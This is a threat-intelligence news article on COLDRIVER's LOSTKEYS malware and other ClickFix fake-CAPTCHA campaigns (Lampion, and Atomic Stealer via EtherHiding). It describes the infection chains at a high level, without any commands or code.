The threat actor known as COLDRIVER , linked to Russia, has been found distributing a new malware named LOSTKEYS as part of an espionage-focused operation using ClickFix-style social engineering tactics.
The Google Threat Intelligence Group (GTIG) stated that “LOSTKEYS is capable of stealing files from a predefined list of extensions and directories, as well as sending system information and running processes to the attacker.”
GTIG reported that LOSTKEYS was detected in attacks on advisors to Western governments and militaries, journalists, think tanks, NGOs, and individuals linked to Ukraine in January, March, and April 2025. The malware marks the second custom tool attributed to COLDRIVER after SPICA, indicating a shift from their traditional credential phishing activities.
Security researcher Wesley Shields mentioned, “COLDRIVER is known for stealing credentials and exfiltrating emails and contact lists from compromised accounts. In some cases, they also deliver malware to target devices and attempt to access files on the system.”
The recent attacks start with a fake CAPTCHA verification prompt on a decoy website, instructing victims to run a PowerShell command through a widely used social engineering technique known as ClickFix.
The PowerShell command downloads and executes the next payload from a remote server before deploying LOSTKEYS on the compromised host, enabling the threat actor to gather system information, running processes, and files specified in a predefined list of extensions and directories.
Similar to SPICA, LOSTKEYS is deployed selectively, highlighting the highly targeted nature of these attacks.
A Base64-encoded blob serves as the third-stage payload, decoded into a PowerShell script responsible for executing LOSTKEYS, allowing the threat actor to gather system information and files from specified extensions and directories.
Additional artifacts of LOSTKEYS dating back to December 2023 were discovered by Google, posing as binaries related to the Maltego open-source investigation platform. It’s unclear if these samples are linked to COLDRIVER or repurposed by threat actors starting January 2025.
ClickFix Adoption on the Rise
ClickFix is being increasingly adopted by various threat actors to distribute a range of malware families, including Lampion, a banking trojan, and Atomic Stealer.
Attacks involving Lampion use phishing emails with ZIP file attachments containing an HTML file that redirects recipients to a fake landing page with ClickFix instructions to initiate the infection process.
Unit 42 from Palo Alto Networks revealed that the Lampion infection chain consists of several non-consecutive stages executed as separate processes, complicating detection due to the dispersed execution flow.
The malicious campaign targeted Portuguese-speaking entities in government, finance, and transportation sectors.
Recent months have seen the combination of ClickFix with EtherHiding, utilizing Binance’s Smart Chain contracts to conceal payloads and deliver macOS information stealer, Atomic Stealer.
An independent researcher known as Badbyte explained that users triggering the Binance Smart Contract are prompted to run a Base64-encoded command in Terminal via macOS-specific shortcuts, leading to the execution of Atomic Stealer.
The campaign, dubbed MacReaper, compromised approximately 2,800 legitimate websites to deploy fake CAPTCHA prompts, employing obfuscated JavaScript, full-screen iframes, and blockchain-based command infrastructure for maximum infections.
The researcher highlighted, “The attack leverages obfuscated JavaScript, three full-screen iframes, and blockchain-based command infrastructure to maximize infections.”
